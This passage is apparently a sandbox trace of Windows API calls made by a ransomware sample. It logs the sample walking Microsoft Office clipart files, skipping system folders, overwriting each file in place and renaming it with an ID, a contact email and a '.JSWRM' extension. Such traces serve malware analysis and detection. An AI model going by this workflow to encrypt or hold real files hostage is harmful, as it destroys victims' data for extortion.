lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5880, lpOverlapped=0x0) returned 1 [0091.487] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.487] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5880, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5880, lpOverlapped=0x0) returned 1 [0091.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.487] CloseHandle (hObject=0x314) returned 1 [0091.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0091.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0091.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0091.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0091.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0091.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0091.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.487] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00525_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00525_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00525_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0091.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0091.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0091.491] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x477c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00530_.WMF", cAlternateFileName="")) returned 1 [0091.491] lstrcmpiW (lpString1="NA00530_.WMF", lpString2=".") returned 1 [0091.491] lstrcmpiW (lpString1="NA00530_.WMF", lpString2="..") returned 1 [0091.491] lstrcmpiW (lpString1="NA00530_.WMF", lpString2="...") returned 1 [0091.491] lstrcmpiW (lpString1="NA00530_.WMF", lpString2="windows") returned -1 [0091.492] lstrcmpiW (lpString1="NA00530_.WMF", lpString2="recovery") returned -1 [0091.492] lstrcmpiW (lpString1="NA00530_.WMF", lpString2="perflogs") returned -1 [0091.492] lstrcmpiW (lpString1="NA00530_.WMF", lpString2="documents and settings") returned 1 [0091.492] lstrcmpiW (lpString1="NA00530_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.492] lstrcmpiW (lpString1="NA00530_.WMF", lpString2="system volume information") returned -1 [0091.492] lstrcmpiW (lpString1="NA00530_.WMF", lpString2="msocache") returned 1 [0091.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0091.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00530_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00530_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00530_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0091.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0091.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00530_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00530_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00530_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0091.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0091.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0091.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00530_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00530_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.492] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18300) returned 1 [0091.492] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4770) returned 0x24d210 [0091.493] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4770, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4770, lpOverlapped=0x0) returned 1 [0091.495] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.495] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4770, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4770, lpOverlapped=0x0) returned 1 [0091.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.495] CloseHandle (hObject=0x314) returned 1 [0091.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0091.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0091.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0091.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0091.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0091.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0091.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.496] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00530_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00530_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00530_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00530_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0091.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0091.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0091.496] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x530, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00532_.WMF", cAlternateFileName="")) returned 1 [0091.496] lstrcmpiW (lpString1="NA00532_.WMF", lpString2=".") returned 1 [0091.496] lstrcmpiW (lpString1="NA00532_.WMF", lpString2="..") returned 1 [0091.497] lstrcmpiW (lpString1="NA00532_.WMF", lpString2="...") returned 1 [0091.497] lstrcmpiW (lpString1="NA00532_.WMF", lpString2="windows") returned -1 [0091.497] lstrcmpiW (lpString1="NA00532_.WMF", lpString2="recovery") returned -1 [0091.497] lstrcmpiW (lpString1="NA00532_.WMF", lpString2="perflogs") returned -1 [0091.497] lstrcmpiW (lpString1="NA00532_.WMF", lpString2="documents and settings") returned 1 [0091.497] lstrcmpiW (lpString1="NA00532_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.497] lstrcmpiW (lpString1="NA00532_.WMF", lpString2="system volume information") returned -1 [0091.497] lstrcmpiW (lpString1="NA00532_.WMF", lpString2="msocache") returned 1 [0091.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0091.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00532_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00532_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00532_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0091.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0091.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00532_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00532_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00532_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0091.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0091.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0091.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0091.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00532_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00532_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.497] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1328) returned 1 [0091.498] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x530) returned 0x21af28 [0091.498] ReadFile (in: hFile=0x314, lpBuffer=0x21af28, nNumberOfBytesToRead=0x530, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x21af28*, lpNumberOfBytesRead=0x345e89c*=0x530, lpOverlapped=0x0) returned 1 [0091.499] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.499] WriteFile (in: hFile=0x314, lpBuffer=0x21af28*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x21af28*, lpNumberOfBytesWritten=0x345e898*=0x530, lpOverlapped=0x0) returned 1 [0091.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 [0091.499] CloseHandle (hObject=0x314) returned 1 [0091.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0091.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0091.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0091.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0091.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0091.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0091.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.500] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00532_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00532_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00532_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00532_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0091.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0091.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0091.501] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7d14, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00538_.WMF", cAlternateFileName="")) returned 1 [0091.501] lstrcmpiW (lpString1="NA00538_.WMF", lpString2=".") returned 1 [0091.501] lstrcmpiW (lpString1="NA00538_.WMF", lpString2="..") returned 1 [0091.501] lstrcmpiW (lpString1="NA00538_.WMF", lpString2="...") returned 1 [0091.501] lstrcmpiW (lpString1="NA00538_.WMF", lpString2="windows") returned -1 [0091.501] lstrcmpiW (lpString1="NA00538_.WMF", lpString2="recovery") returned -1 [0091.501] lstrcmpiW (lpString1="NA00538_.WMF", lpString2="perflogs") returned -1 [0091.501] lstrcmpiW (lpString1="NA00538_.WMF", lpString2="documents and settings") returned 1 [0091.501] lstrcmpiW (lpString1="NA00538_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.501] lstrcmpiW (lpString1="NA00538_.WMF", lpString2="system volume information") returned -1 [0091.501] lstrcmpiW (lpString1="NA00538_.WMF", lpString2="msocache") returned 1 [0091.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0091.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00538_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00538_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00538_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0091.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0091.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00538_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00538_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00538_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0091.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0091.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0091.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00538_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00538_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.502] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32020) returned 1 [0091.502] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7d10) returned 0x24d210 [0091.502] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7d10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7d10, lpOverlapped=0x0) returned 1 [0091.506] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.506] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7d10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7d10, lpOverlapped=0x0) returned 1 [0091.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.507] CloseHandle (hObject=0x314) returned 1 [0091.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0091.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0091.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 